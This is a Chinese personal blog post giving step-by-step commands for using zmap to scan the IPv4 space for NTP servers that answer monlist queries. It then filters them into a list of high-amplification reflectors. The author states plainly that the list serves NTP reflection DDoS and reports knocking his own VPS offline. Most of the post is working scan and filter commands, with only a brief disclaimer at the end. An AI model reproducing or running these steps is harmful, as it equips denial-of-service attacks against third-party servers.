日记

使用zmap扫描ntp_monlist列表并过滤

by 皮师傅, 2021-06-05


当下网络安全似乎越来越是一些IDC行业关心的话题,前段时间闲来无事扫了个NTP列表对自己买的BuyVM挺便宜的VPS(带DDOS Protection)做了下压测,结果让我挺感慨的。秒崩,并且!!现在DDoS成本和门槛是真的低,采用的NTP反射放大攻击,记录一下操作流程。

基本操作

安装必要的软件包 (测试用Ubuntu系统)

apt -y install screen curl zmap

将zmap探针文件拷贝到指定目录

mkdir -p /root/pkt && cp /usr/share/doc/zmap/examples/udp-probes/*.pkt /root/pkt

开始扫描

screen zmap -M udp -p 123 --probe-args=file:/root/udp/ntp_123_monlist.pkt -o monlist_fingerprint.txt

扫描完成即得到完整的monlist_fingerprint.txt

检查和过滤

去这里下载文件更名为ntpchecker上传至服务器并给到可执行权限

chmod +x ntpchecker

接下来开始检查

./ntpchecker monlist_fingerprint.txt step1.txt 1 0 1

检查完成得到step1.txt拿去过滤

awk '$2>400{print $1}' step1.txt | sort -n | uniq | sort -R > ntp.txt

高级用法

指定CIDR扫描,可以使用-w $path参数,并且建议带宽不是特别大的情况下限制带宽为100Mbps进行扫描防止漏扫,用法如下

screen zmap -M udp -p 123 -w /root/ips.txt --probe-args=file:/root/udp/ntp_123_monlist.pkt -o monlist_fingerprint.txt -B 100M

顺便推荐一个IPV4 CIDR归档站点:https://ipv4.fetus.jp/

写在最后

恶意攻击他人服务器(包括攻击非法站点进行勒索)是不道德且违背法律的行为,本文仅用于个人研究学习和测试,切勿用于非法用途。所以千万放过我别来打我,腾讯云小水管一碰就挂

网络安全
皮师傅

作者: 皮师傅

2021 © typecho & Master·Pi